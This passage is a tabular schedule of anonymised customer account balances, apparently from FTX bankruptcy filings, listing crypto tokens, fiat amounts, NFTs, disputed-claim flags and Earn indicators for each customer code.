| 07320518 | | AVAX[1.35879384], CUSDT[1], DOGE[225.92540457], SHIB[1], TRX[1], USD[0.00] | Yes | |
| 07320519 | | USD[10.00] | | |
| 07320520 | | USD[10.00] | | |
| 07320523 | | CUSDT[1], DOGE[1], TRX[2], USD[0.00] | | |
| 07320524 | | CUSDT[1], DOGE[6110.23830074], USD[10.00] | | |
| 07320525 | | BAT[4], BRZ[2], CUSDT[6], DOGE[.00004458], GRT[2], TRX[4], USD[0.72], USDT[2] | | |
| 07320527 | | USD[10.00] | | |
| 07320529 | | BAT[1], DOGE[2], NFT [312423130957478746/Marcus Allen's Playbook: Los Angeles Raiders vs. Washington - January 22, 1984 #19][1], NFT [341190096210484673/Shannon Sharpe's Playbook: Kansas City Chiefs vs Denver Broncos - October 4, 1992 #21][1], NFT [362540658207847549/Shannon Sharpe's Playbook: Baltimore Ravens vs. Denver Broncos - December 31, 2000 #23][1], NFT [376383903349769438/Shannon Sharpe's Playbook: Baltimore Ravens vs. Oakland Raiders - January 14, 2001 #20][1], NFT [395068574056269960/Marcus Allen's Playbook: Kansas City Chiefs vs. Detrioit Lions - November 29, 1996 #15][1], NFT [411284535245091434/Marcus Allen's Playbook: USC vs. Washington - November 14, 1981 #16][1], NFT [414572763658948200/Earl Campbell's Playbook: Texas vs. Houston - November 5th, 1977 #28][1], NFT [430089607588768642/Shannon Sharpe's Playbook: Kansas City Chiefs vs Denver Broncos - October 4, 1992 #18][1], NFT [467994489513334087/Joe Theismann's Playbook: Notre Dame vs. USC - November 30, 1968 #14][1], NFT [488040184400467665/Joe Theismann's Playbook: Washington vs. Miami Dolphins - January 30, 1983 #16][1], NFT [491195332274154672/Shannon Sharpe's Playbook: Baltimore Ravens vs. Denver Broncos - December 31, 2000 #18][1], NFT [569954311878874994/Doak Walker's Playbook: Texas vs. SMU - November 1, 1947 #24][1], SHIB[1], TRX[1], USD[0.01], USDT[0.00002531] | Yes | |
| 07320530 | | CUSDT[1], SOL[.26717376], USD[0.22] | | |
| 07320531 | | CUSDT[1], DOGE[2], LINK[2.05688636], USD[6.65] | | |
| 07320533 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07320536 | | USD[10.00] | | |
| 07320537 | | USD[10.00] | | |
| 07320538 | | ETH[0], GRT[0], UNI[0], USD[0.00] | | |
| 07320540 | | USD[10.00] | | |
| 07320541 | | USD[10.00] | | |
| 07320542 | | USD[10.00] | | |
| 07320543 | | DOGE[130.24141673], ETH[.016454], ETHW[.016454], LTC[.00956], USD[0.31] | | |
| 07320545 | | USD[10.00] | | |
| 07320546 | | BTC[0.06308515], DOGE[0] | | |
| 07320548 | | BRZ[1], DOGE[1], TRX[1], USD[0.01] | | |
| 07320550 | | CUSDT[1], DOGE[1], SHIB[1], USD[0.01] | Yes | |
| 07320553 | | DOGE[1.36408724], USD[0.00] | | |
| 07320555 | | USD[10.00] | | |
| 07320556 | | USD[10.00] | | |
| 07320557 | | USD[10.00] | | |
| 07320560 | Contingent, Disputed | DAI[0], USD[0.00], USDT[0] | Yes | |
| 07320565 | | DOGE[1], USD[0.01] | | |
| 07320566 | | BTC[0], ETH[.000996], ETHW[.000996], USD[0.29], USDT[1.29594954] | | |
| 07320567 | | DOGE[1], USD[0.00] | | |
| 07320568 | | BTC[0], DOGE[0], SUSHI[0], USD[0.37], USDT[0.00000011] | | |
| 07320569 | | DOGE[.3883], USD[0.70] | | |
| 07320570 | | USD[10.00] | | |
| 07320571 | | BRZ[1], CUSDT[3], DOGE[131.7636907], USD[0.07] | | |
| 07320572 | | USD[10.00] | | |
| 07320573 | | DOGE[1.00008102], TRX[.00001235], USD[57.04] | | |
| 07320575 | | BRZ[2], CUSDT[3], DOGE[1], SHIB[2219001.14621134], TRX[2], USD[0.00] | Yes | |
| 07320576 | | USD[10.00] | | |
| 07320578 | | USD[6.62] | | |
| 07320579 | | USD[10.00] | | |
| 07320583 | | BF_POINT[100], BTC[0], ETH[.00000001], ETHW[0], SOL[0.10691319], USD[0.00] | Yes | |
| 07320584 | | CUSDT[9], TRX[206.9763936], USD[0.00] | | |
| 07320586 | | CUSDT[1], DOGE[1481.49327855], USD[10.00] | | |
| 07320587 | | TRX[1], USD[0.01] | | |
| 07320588 | | DOGE[0] | | |
| 07320589 | | BRZ[1], BTC[.00020975], DOGE[246.6919631], TRX[1], USD[0.66] | Yes | |
| 07320590 | | CUSDT[2], DOGE[4460.52310835], KSHIB[756.1237708], SHIB[859401.856308], USD[0.02] | | |
| 07320592 | | USD[10.00] | | |
| 07320593 | | USD[10.00] | | |
| 07320594 | | USD[10.00] | | |
| 07320595 | | BTC[0], ETH[0], ETHW[0.05771319], USD[109.09] | | |
| 07320596 | | USD[10.00] | | |
| 07320598 | | BAT[87.88112627], BRZ[3], CUSDT[14], GRT[58.48735084], LINK[1.01749947], SHIB[1], SOL[25.13587205], SUSHI[13.0575604], TRX[1291.09591128], USD[94.14], USDT[1.07164625] | Yes | |
| 07320599 | | SHIB[1], SOL[0], USD[0.00] | | |
| 07320600 | | USD[10.00] | | |
| 07320601 | | CUSDT[1], TRX[2], USD[0.00] | | |
| 07320603 | | DOGE[18.09453115], USD[0.00] | | |
| 07320604 | | USD[10.00] | | |
| 07320605 | | BAT[3.19549818], BF_POINT[500], BRZ[14.93818612], BTC[.24600371], CUSDT[336.20385069], DOGE[3321.7746526], ETH[3.31888819], ETHW[3.31778889], GRT[4.17203847], SHIB[153], SOL[385.37735078], SUSHI[276.50799467], TRX[68.76011367], UNI[18.72185401], USD[55.41], USDT[2.15867171] | Yes | |
| 07320607 | | AUD[0.00], BAT[0.56087441], BCH[0], BRZ[6.72249219], BTC[0.00033173], CUSDT[8.00002901], DAI[0.00031217], DOGE[1], ETH[0], GBP[0.00], GRT[0], LINK[.00000004], LTC[0.00050465], SGD[0.08], SOL[0.00007561], SUSHI[0], TRX[9.30650181], UNI[0], USD[0.60] | Yes | |
| 07320608 | | CUSDT[2077.97810328], DOGE[3647.61535059], TRX[744.88114054], USD[55.40] | Yes | |
| 07320611 | | USD[10.00] | | |
| 07320612 | | USD[10.00] | | |
| 07320613 | | USD[10.00] | | |
| 07320614 | | CUSDT[3], ETH[.05847205], ETHW[.05847205], USD[0.00] | | |
| 07320615 | | CUSDT[1], DOGE[66.81958551], TRX[1], USD[0.01] | | |
| 07320616 | | USD[10.00] | | |
| 07320617 | | CUSDT[6], TRX[1], USD[0.01] | | |
| 07320618 | | BAT[0], BTC[0], DOGE[0], ETH[0], GRT[0], LTC[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USDT[0.00029763], YFI[0] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07320619 | | USD[10.00] | | |
| 07320621 | | BTC[.00007005], DOGE[84.69374336], USD[7.65] | | |
| 07320623 | | CUSDT[3], DOGE[1.79430205], TRX[2], USD[0.00] | | |
| 07320624 | | USD[10.00] | | |
| 07320626 | | USD[10.00] | | |
| 07320627 | | AAVE[.11324255], BCH[.02397213], BTC[.0023954], CUSDT[739.22609235], DOGE[25.05037009], ETH[.01211004], ETHW[.01195956], LTC[.12464088], MKR[.01078105], SUSHI[4.53269011], TRX[64.10632642], UNI[2.33876635], USD[55.46], USDT[5.46373793], YFI[.00040232] | Yes | |
| 07320629 | | DOGE[2.02820786], USD[0.01] | | |
| 07320630 | | BCH[.08044165], CUSDT[1], USD[0.00] | | |
| 07320632 | | CUSDT[7], SOL[0.09678915], USD[0.00] | Yes | |
| 07320633 | | BRZ[0], BTC[0], DOGE[2], USD[0.00], USDT[0.00060499] | Yes | |
| 07320635 | | USD[10.00] | | |
| 07320636 | | USD[10.00] | | |
| 07320637 | | AVAX[0], DOGE[0], ETH[0], ETHW[0], SOL[0], USD[0.00] | | |
| 07320642 | | USD[10.00] | | |
| 07320643 | | BCH[0], BTC[0], DOGE[0], ETH[0], LTC[0], SHIB[1], SOL[0], SUSHI[0], UNI[0], USD[0.00], USDT[0] | Yes | |
| 07320645 | | BTC[.00021522], USD[0.00] | | |
| 07320646 | | USD[10.00] | | |
| 07320648 | | USD[0.00] | | |
| 07320650 | | USD[10.00] | | |
| 07320651 | | USD[10.00] | | |
| 07320653 | | USD[10.86] | Yes | |
| 07320657 | | DOGE[16.70727105], USD[0.00] | Yes | |
| 07320659 | | MATIC[1], NFT [350548668180224818/Garbage #1 #1][1], SOL[0.00000001], USD[3052.02], USDT[0.00000002] | | |
| 07320660 | | USD[0.05], USDT[0.08561925] | | |
| 07320662 | | BTC[0.03890340], ETH[.15], ETHW[0.15000000], LINK[39.96], USD[-3.29] | | |
| 07320665 | | DOGE[1], USD[5.02] | | |
| 07320668 | | BTC[0], DOGE[0], ETH[0], USD[0.00] | | |
| 07320671 | | BTC[.0000556], DOGE[.1], USD[4.71] | | |
| 07320675 | | USD[10.00] | | |
| 07320676 | | CUSDT[1], DOGE[196.58064677], USD[116.18] | | |
| 07320677 | | USD[10.00] | | |
| 07320679 | | BTC[.0000213], USD[0.00] | | |
| 07320681 | | USD[0.00], USDT[0] | | |
| 07320682 | | BTC[.0056943], DOGE[26420.431], ETH[.044955], ETHW[.044955], TRX[3917.079], USD[11.48] | | |
| 07320683 | | BTC[0.00007492], DOGE[0], ETH[0.00044598], ETHW[0.00044598], LTC[0], USD[1.80] | | |
| 07320687 | | USD[10.00] | | |
| 07320689 | | CUSDT[1], USD[57.00] | | |
| 07320690 | | DOGE[1], USD[0.05] | | |
| 07320691 | | USD[10.00] | | |
| 07320692 | | CUSDT[3], DOGE[607.75099494], USD[2.65] | | |
| 07320693 | | USD[10.00] | | |
| 07320694 | | USD[10.00] | | |
| 07320695 | | USD[10.00] | | |
| 07320697 | | DOGE[834.196] | | |
| 07320698 | | USD[0.41] | | |
| 07320699 | | NFT [299980440249212219/Coachella x FTX Weekend 2 #9764][1], USD[10.00] | | |
| 07320702 | | CUSDT[13], DOGE[1], TRX[4210.43973709], USD[0.01] | Yes | |
| 07320704 | | USD[10.00] | | |
| 07320705 | | DOGE[27.45796654], SHIB[1], USD[0.00] | | |
| 07320706 | | CUSDT[9], TRX[3], USD[0.00] | Yes | |
| 07320707 | | USD[10.00] | | |
| 07320709 | | BRZ[1], TRX[1], USD[0.00], USDT[14.59341970] | | |
| 07320710 | | DOGE[.14507157], USD[0.00] | | |
| 07320711 | | USD[10.00] | | |
| 07320712 | | CUSDT[4], DOGE[0], SHIB[4], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07320713 | | CUSDT[470.11422321], DOGE[1263.94627253], TRX[1], UNI[6.43075802], USD[0.65] | | |
| 07320715 | | USD[10.00] | | |
| 07320716 | | DOGE[171.58911102], GRT[20.84453745], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07320717 | | ALGO[.00372081], BAT[3.26374957], BRZ[6.42940787], BTC[0.00000020], CUSDT[8], DOGE[0], GRT[2.06403547], LTC[0], MATIC[0.00648808], SHIB[1142471.95331498], TRX[7], USD[0.00] | Yes | |
| 07320718 | | USD[10.00] | | |
| 07320722 | | DOGE[1.00004684], TRX[1], USD[0.00], USDT[0] | | |
| 07320723 | | BAT[5.27610011], BRZ[4], CUSDT[7], DOGE[3.94076659], GRT[4.12245591], LINK[.01245631], TRX[10.00055995], UNI[2.04357776], USD[0.00], USDT[3.22122957] | Yes | |
| 07320724 | | BTC[.00032394], DOGE[651.12224068], ETH[.04072645], ETHW[.04072645], LTC[.04232854], PAXG[0.00304036], USDT[1.1673305] | | |
| 07320725 | | DOGE[.75055537], USD[0.00] | | |
| 07320726 | | CUSDT[1], DOGE[50.07876139], TRX[1], USD[0.00] | | |
| 07320727 | | USD[10.00] | | |
| 07320728 | | USD[10.00] | | |
| 07320729 | | BAT[.00290377], BRZ[1], DOGE[3], ETH[.00000025], ETHW[.00000025], GRT[.00171987], KSHIB[2271.18010661], MATIC[.00082401], SHIB[2814966.90418367], TRX[2.03191804], UNI[.00000938], USD[0.00], USDT[2.17526166] | Yes | |
| 07320730 | | CUSDT[2], DOGE[.00001378], TRX[271.65532737], USD[0.11] | Yes | |
| 07320733 | | BAT[3.24848267], BRZ[4], BTC[0], CUSDT[24], DOGE[11.61801527], ETH[0], GRT[2.07852478], SOL[0], TRX[18.49538054], USD[0.00], USDT[0] | Yes | |
| 07320734 | | DOGE[139.74984498], USD[0.00] | | |
| 07320736 | | USD[10.00] | | |
| 07320737 | | USD[10.00] | | |
| 07320740 | | USD[10.00] | | |
| 07320741 | | DOGE[4], USD[0.01] | | |
| 07320743 | | COMP[.05718791], SOL[1.242463], TRX[350.5554], USD[0.61] | | |
| 07320744 | | DOGE[.00009182], USD[0.27] | | |
| 07320745 | | USD[0.00] | | |
| 07320746 | | USD[10.00] | | |
| 07320749 | | BRZ[1], USD[106.02] | | |
| 07320750 | | CUSDT[88.06907895], DOGE[3], ETH[.00000001], TRX[9.01851208], USD[0.98] | Yes | |
| 07320751 | | CUSDT[2], DOGE[0], SHIB[0], USD[0.01] | Yes | |
| 07320752 | | CUSDT[2], DOGE[1.00002034], TRX[1], USD[0.00] | | |
| 07320753 | | BTC[.00017687], USD[0.00] | | |
| 07320754 | | USD[10.00] | | |
| 07320755 | | USD[0.01], USDT[0] | Yes | |
| 07320757 | | USD[10.00] | | |
| 07320758 | | USD[10.00] | | |
| 07320759 | | BAT[643.31848684], BRZ[1], CUSDT[3], DOGE[1], ETH[0], LTC[0], SUSHI[15.06656358], USD[0.00] | | |
| 07320761 | | CUSDT[1], DOGE[1], USD[0.00] | | |
| 07320762 | | USD[10.00] | | |
| 07320763 | | USD[10.00] | | |
| 07320764 | | BRZ[1], SUSHI[.60859526], USD[0.00] | | |
| 07320765 | | USD[10.00] | | |
| 07320766 | | BAT[1], BRZ[1], CUSDT[8], TRX[1], USD[0.00] | | |
| 07320767 | | CUSDT[1], DOGE[1501.59552032], USD[10.00] | | |
| 07320768 | | BAT[.10396609], CUSDT[1], DOGE[1], GRT[1], USD[0.00] | | |
| 07320769 | | USD[10.00] | | |
| 07320770 | | USD[10.00] | | |
| 07320771 | | DOGE[1.00086962], USD[0.19] | | |
| 07320772 | | USD[10.00] | | |
| 07320773 | | BTC[0], SUSHI[0], USD[0.00] | | |
| 07320775 | | CUSDT[1], DOGE[0], USD[0.00] | | |
| 07320778 | | CUSDT[3], DOGE[3], TRX[1], USD[0.00] | Yes | |
| 07320780 | | BRZ[1], DOGE[126.83740715], TRX[1], USD[0.00] | | |
| 07320781 | | BAT[.00436082], BRZ[0.00188831], BTC[0.00469392], CUSDT[.00297336], USD[0.10] | | |
| 07320782 | | CUSDT[3], DOGE[51.17046592], USD[0.96] | | |
| 07320783 | | BRZ[1], BTC[.00903262], CUSDT[6], ETH[0], SOL[1.14043687], TRX[7], USD[143.82] | Yes | |
| 07320784 | | BTC[.00019468], DOGE[1418.57253522], SHIB[1312004.67787333], USD[0.00] | | |
| 07320785 | | DOGE[.014], SUSHI[.4955], USD[39.08] | | |
| 07320786 | | SHIB[1], TRX[1], USD[114.79] | | |
| 07320790 | | DOGE[184.5701564], USD[0.00] | | |
| 07320791 | | DOGE[.208], USD[0.52] | | |
| 07320792 | | USD[10.00] | | |
| 07320794 | | USD[2.00] | | |
| 07320797 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07320798 | | USD[10.00] | | |
| 07320800 | | DOGE[0], ETH[0.00094503], ETHW[0.00094503], TRX[420.18377335], USD[0.04] | | |
| 07320801 | | USD[10.00] | | |
| 07320802 | | DOGE[25.3018466], USD[0.00] | | |
| 07320803 | | USD[10.00] | | |
| 07320805 | | USD[10.00] | | |
| 07320806 | | BTC[0], DOGE[.999], ETH[0], ETHW[0.01251214], USD[16.35] | | |
| 07320808 | | USD[10.00] | | |
| 07320812 | | CUSDT[10], DOGE[3.08005393], USD[0.00] | | |
| 07320813 | | ETH[0], USD[0.00], USDT[0] | | |
| 07320816 | | BRZ[1], CUSDT[3], TRX[1], USD[0.00], USDT[1] | | |
| 07320821 | | BTC[.00002265], NFT (49751070663934823/Entrance Voucher #3985)[1], USD[0.00] | Yes | |
| 07320822 | | USD[10.00] | | |
| 07320823 | | DOGE[.3842763], USD[32.11] | | |
| 07320824 | | DOGE[176.823], USD[0.02] | | |
| 07320825 | | DOGE[1], TRX[1], USD[0.01] | | |
| 07320826 | | DOGE[0], ETH[0], SOL[0], USD[0.00], USDT[0.00919305] | | |
| 07320828 | | USD[10.00] | | |
| 07320830 | | DOGE[.0796], USD[0.27] | | |
| 07320832 | | BRZ[1], BTC[.00460749], CUSDT[2], DOGE[808.16348361], TRX[2], USD[0.00] | | |
| 07320833 | | DOGE[324.69125], USD[0.25] | | |
| 07320836 | | BTC[.00040615], CUSDT[7], USD[0.00] | | |
| 07320837 | | USD[0.01] | | |
| 07320839 | | DOGE[0], USD[1.78] | | |
| 07320841 | | BTC[0], DOGE[0], USD[0.11] | | |
| 07320842 | | USD[10.00] | | |
| 07320843 | | USD[10.00] | | |
| 07320845 | | USD[10.06] | | |
| 07320846 | | DOGE[0], ETH[.00000001], ETHW[0], USD[0.00], USDT[0] | | |
| 07320849 | | USD[10.00] | | |
| 07320850 | | BTC[0], DOGE[0] | | |
| 07320851 | | BRZ[1], BTC[.00100601], CUSDT[2], DOGE[1.1853973], TRX[1], USD[0.00] | | |
| 07320853 | | USD[10.00] | | |
| 07320855 | | BTC[0], DOGE[0] | | |
| 07320856 | | USD[10.00] | | |
| 07320857 | | USD[0.00] | | |
| 07320860 | | USD[10.00] | | |
| 07320861 | | BCH[.00508814], BTC[.00004374], DOGE[17.46241433], ETH[.00109485], ETHW[.00109485], SUSHI[.04932742], USD[0.50] | | |
| 07320862 | | BCH[.00670222], USD[0.00] | | |
| 07320863 | | BTC[0], TRX[67], USD[0.00], USDT[0] | | |
| 07320864 | | DOGE[1], USD[0.00] | | |
| 07320866 | | USD[10.00] | | |
| 07320867 | Contingent, Disputed | BAT[.00000001], BTC[0], DOGE[0], ETH[0], SOL[0] | | |
| 07320869 | | USD[10.00] | | |
| 07320871 | | BAT[1], BRZ[2], CUSDT[2], DOGE[0], TRX[1], UNI[0], USD[0.00], USDT[0] | | |
| 07320877 | | USD[10.00] | | |
| 07320878 | | NFT (43765031805977235/Coachella x FTX Weekend 2 #13889)[1], SHIB[1], SOL[.09728087], USD[0.00] | Yes | |
| 07320879 | | DAI[-0.00000001], DOGE[0.08467388], ETH[0.00080200], ETHW[0], LTC[0], SUSHI[.00000001], UNI[.00000001], USD[2.50], USDT[0] | | |
| 07320880 | | BTC[.00016801], TRX[1], USD[0.00] | | |
| 07320883 | | BTC[0], DOGE[0], USD[0.00] | | |
| 07320886 | | USD[10.00] | | |
| 07320888 | | USD[10.00] | | |
| 07320889 | Contingent, Disputed | BTC[0], DOGE[0], SOL[0], USD[0.97] | | |
| 07320892 | | USD[10.00] | | |
| 07320893 | | USD[10.00] | | |
| 07320894 | | BRZ[.8974], BTC[.00009619], CUSDT[.81505], USD[0.00], USDT[3.47978558] | | |
| 07320896 | | DOGE[11299.62], USD[0.07] | | |
| 07320897 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07320898 | | BAT[13.63124931], BF_POINT[100], BTC[.00080844], DOGE[1], USD[0.06] | Yes | |
| 07320901 | | DOGE[0.14555755], USD[0.00] | | |
| 07320902 | | BTC[.06755484], DOGE[7311.24628446], ETH[.32415332], ETHW[.32415332], SOL[2.28213362], USD[0.00] | | |
| 07320903 | | DOGE[1], ETH[0], ETHW[0], GRT[1], SOL[0], USD[0.96] | | |
| 07320904 | | USD[10.00] | | |
| 07320905 | | USD[10.00] | | |
| 07320911 | | DOGE[103.03680371], USD[10.00] | | |
| 07320912 | | USD[10.00] | | |
| 07320913 | | BTC[0], DOGE[0], USD[0.00], USDT[0.00048078] | | |
| 07320914 | | CUSDT[9], USD[0.00] | | |
| 07320917 | | BCH[0], BTC[0.00000140], DOGE[0], ETH[0], ETHW[0], GRT[0], LINK[0], SUSHI[0], TRX[0], USD[0.00] | Yes | |
| 07320918 | | BAT[0], DOGE[0], USD[0.00] | | |
| 07320920 | Contingent, Disputed | BRZ[1], USD[0.00] | | |
| 07320921 | | USD[10.00] | | |
| 07320922 | | DOGE[1737.34565204], TRX[1], USD[10.00] | | |
| 07320923 | | USD[10.00] | | |
| 07320924 | | USD[10.00] | | |
| 07320927 | | CUSDT[30], ETH[.00000001], ETHW[0], TRX[3], USD[0.00] | | |
| 07320928 | | BAT[2], BCH[0], BTC[0], CUSDT[64], DOGE[0], ETH[0], GRT[0], LINK[0], LTC[0], SOL[0], SUSHI[0], TRX[41], UNI[0], USD[0.01], USDT[2.00399175], YFI[0] | | |
| 07320932 | | DOGE[26.18631537], USD[0.00] | | |
| 07320933 | | USD[10.00] | | |
| 07320937 | | USD[0.01] | | |
| 07320939 | | DOGE[808.23145], USD[0.27] | | |
| 07320940 | | DOGE[.088], SUSHI[.2865], USD[0.00] | | |
| 07320943 | | DOGE[32.20215], USD[1.11], USDT[0] | | |
| 07320944 | | BAT[0], BCH[0], BRZ[0], BTC[0], DAI[0], DOGE[0], ETH[0], GRT[0], LINK[0], MATIC[0], SHIB[110410604.93297546], SOL[62.12350830], SUSHI[0], TRX[2], USD[-200.00], USDT[0], YFI[0] | Yes | |
| 07320945 | | USD[1.18] | | |
| 07320947 | | BTC[0], DOGE[0], ETH[0.10341875], ETHW[0.10341875], USD[0.00] | | |
| 07320950 | | CUSDT[6], ETHW[.01016878], USD[0.00] | | |
| 07320951 | | BRZ[1], DOGE[5046.68442912], SUSHI[1], USD[0.00], USDT[0] | | |
| 07320955 | | DOGE[525.267], USD[10.73] | | |
| 07320957 | | USD[10.00] | | |
| 07320959 | | USD[10.00] | | |
| 07320960 | | USD[10.00] | | |
| 07320963 | | BAT[1.46121943], BRZ[0], BTC[0.00000313], DOGE[0], ETH[0], ETHW[3.08663002], GRT[0], LINK[1.02157703], MATIC[0.00673627], NFT (379358135443747824/CryptoAvatar #22)[1], NFT (380100220808503765/CryptoAvatar #15)[1], PAXG[0], SHIB[4099.64049098], TRX[.01323312], USD[0.00], USDT[0] | Yes | |
| 07320969 | | CUSDT[1], DOGE[312.27583237], TRX[92.13807886], USD[0.00] | | |
| 07320971 | | USD[0.59], USDT[0] | | |
| 07320972 | | DOGE[1019.8742377], USD[10.00] | | |
| 07320976 | | USD[10.00] | | |
| 07320977 | | DOGE[11.43610131], TRX[1], USD[0.00] | | |
| 07320978 | | ETH[.0028141], ETHW[.0028141], USD[0.00] | | |
| 07320979 | | USD[10.00] | | |
| 07320980 | | USD[10.00] | | |
| 07320982 | | LTC[.00984097], TRX[.000001], USD[0.01] | | |
| 07320983 | | USD[10.00] | | |
| 07320984 | | BTC[0], DOGE[0], USD[0.00], USDT[0] | | |
| 07320985 | | USD[10.00] | | |
| 07320989 | | USD[21.55] | Yes | |
| 07320991 | | BTC[0], DOGE[0], USD[0.00] | | |
| 07320992 | | DOGE[1.0000304], USD[21.09] | | |
| 07320993 | | USD[10.00] | | |
| 07320994 | | DOGE[.532] | | |
| 07320995 | | BAT[1], BRZ[2], BTC[.00172508], DOGE[6.9008216], TRX[4], USD[0.15], USDT[1] | | |
| 07320998 | | USD[0.00] | | |
| 07321001 | | USD[10.00] | | |
| 07321003 | | USD[10.00] | | |
| 07321005 | | USD[0.00] | | |
| 07321006 | | KSHIB[287.94932091], SOL[.27167063], USD[10.31] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07321008 | | ETH[.00607043], ETHW[.00607043], USD[0.00] | | |
| 07321011 | | BTC[.00139886], DOGE[.86092988], ETH[0.04779348], ETHW[0.04779348], LINK[2.29411], SOL[6.93214], USD[0.00], USDT[.00000001] | | |
| 07321013 | | DOGE[1315.808], USD[0.14] | | |
| 07321014 | | CUSDT[2], DOGE[430.20675903], SHIB[142792.99506061], TRX[1], USD[0.01] | | |
| 07321016 | | USD[10.00] | | |
| 07321020 | | USD[10.00] | | |
| 07321021 | | BTC[0], DOGE[0], USD[0.01] | | |
| 07321024 | | BTC[.0002886], DOGE[54.8584], ETH[.0038708], ETHW[.0038708], LTC[.935516], SUSHI[.4981], USD[4.65], USDT[.00577568] | | |
| 07321025 | | DOGE[0, ETH[0], ETHW[0], USD[87.91] | | |
| 07321028 | | USD[0.01] | | |
| 07321029 | | USD[0.00] | | |
| 07321031 | | BTC[0], DOGE[0], ETH[0] | | |
| 07321032 | | USD[10.00] | | |
| 07321034 | | BRZ[3], BTC[.00000021], CUSDT[13], DOGE[1], GRT[1], NFT (318354468886303358/Vox Robo #8)[1], NFT (426173583989573359/Shredding )[1], NFT (553699881699472800/Marcus Allen's Playbook: USC vs. Washington - November 14, 1981 #64)[1], SHIB[8422121.06169548], TRX[4], USD[0.00], USDT[0] | Yes | |
| 07321035 | | DOGE[.00004254], USD[0.00] | Yes | |
| 07321036 | | DOGE[0], USD[0.07] | | |
| 07321039 | | CUSDT[1], DOGE[1406.41647664], USD[0.00] | | |
| 07321041 | | USD[10.00] | | |
| 07321045 | | DOGE[156.03093826], TRX[1.5669096], USD[0.00] | Yes | |
| 07321048 | | USD[2.73] | | |
| 07321049 | | SOL[0] | | |
| 07321050 | | USD[10.00] | | |
| 07321055 | | USD[10.00] | | |
| 07321057 | | DOGE[2052.756], USD[0.01] | | |
| 07321058 | | CUSDT[3], DOGE[10.05735825], GRT[19.83086532], USD[0.01] | | |
| 07321059 | | USD[0.00] | | |
| 07321062 | | USD[10.00] | | |
| 07321063 | | TRX[1], USD[0.00] | | |
| 07321064 | | USD[10.00] | | |
| 07321066 | | USD[10.00] | | |
| 07321068 | | CUSDT[1], DOGE[137.83256768], TRX[1], USD[0.01] | | |
| 07321069 | | USD[10.00] | | |
| 07321070 | | BRZ[6.60437035], BTC[0], CUSDT[23], DOGE[18.84091652], GRT[2.07590697], LTC[0], MATIC[.00015389], SOL[0], TRX[12.33522561], USD[0.00] | Yes | |
| 07321071 | | USD[10.00] | | |
| 07321072 | | BTC[.00015191], CUSDT[2], DOGE[120.36920424], SHIB[180434.65090673], TRX[1], USD[10.85], YFI[.00010345] | Yes | |
| 07321073 | | USD[10.00] | | |
| 07321074 | | CUSDT[2], DOGE[.00000604], ETH[.00378734], ETHW[.00378734], GRT[1], USD[0.00] | | |
| 07321075 | | AUD[0.00], DOGE[1], SUSHI[0], TRX[1], USD[0.30] | Yes | |
| 07321076 | | USD[10.00] | | |
| 07321079 | | CUSDT[6], TRX[1], USD[0.00] | | |
| 07321080 | | BAT[1], BRZ[3], DOGE[.23365997], ETH[.01865762], ETHW[.01865762], USD[1.19] | | |
| 07321083 | | USD[10.00] | | |
| 07321085 | | BRZ[1], CUSDT[4], ETH[.00000001], TRX[5.80556389], USD[0.00], USDT[0.00000001] | | |
| 07321088 | | BTC[.00000317], DOGE[.911], USD[0.01] | | |
| 07321090 | | USD[15.82] | | |
| 07321091 | | USD[10.00] | | |
| 07321092 | | BRZ[1], CUSDT[2], DOGE[.00571172], SOL[.0000499], TRX[1], USD[0.00] | | |
| 07321096 | | USD[10.00] | | |
| 07321098 | | AVAX[.00551662], BTC[0], DOGE[0], ETH[0], USD[0.01] | | |
| 07321100 | | USD[10.00] | | |
| 07321101 | | DOGE[1693.58407826], USD[10.00] | | |
| 07321104 | | DOGE[0], LTC[0], SUSHI[51.40619415], TRX[1], USD[0.00] | Yes | |
| 07321105 | | USD[10.00] | | |
| 07321106 | | DOGE[189.5908194], USD[0.00] | | |
| 07321107 | | BRZ[1], BTC[.00021095], DOGE[1141.39701508], ETH[.04216528], ETHW[.04164525], USD[0.00] | Yes | |
| 07321110 | | USD[10.00] | | |
| 07321111 | | DOGE[.00001147], USD[10.00] | | |
| 07321112 | | DOGE[.627], LINK[2.72006988], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07321113 | | CUSDT[1], TRX[2], USD[0.00] | | |
| 07321115 | | BRZ[2], BTC[.00000149], CUSDT[2], DOGE[328.55746027], ETH[.03437966], ETHW[.03395558], NFT (2907894730937247117/FTX Crypto Cup 2022 Key #2958)[1], NFT (354893812596294781/GSW Round 1 Commemorative Ticket #706)[1], NFT (410582565684351197/Barcelona Ticket Stub #764)[1], NFT (453549117076587431/Saudi Arabia Ticket Stub #1834)[1], NFT (469711441790138256/GSW Western Conference Semifinals Commemorative Ticket #989)[1], NFT (504634460815977972/GSW Championship Commemorative Ring)[1], NFT (561336892285301104/GSW 75 Anniversary Diamond #336 (Redeemed))[1], SHIB[3110756.99522137], TRX[5], USD[0.00] | Yes | |
| 07321116 | | USD[10.00] | | |
| 07321117 | | USD[0.02] | | |
| 07321118 | | BF_POINT[200], ETH[0], ETHW[0], SHIB[2], USD[0.01], USDT[0] | Yes | |
| 07321119 | | SOL[0.03250939], USD[0.00], USDT[0] | | |
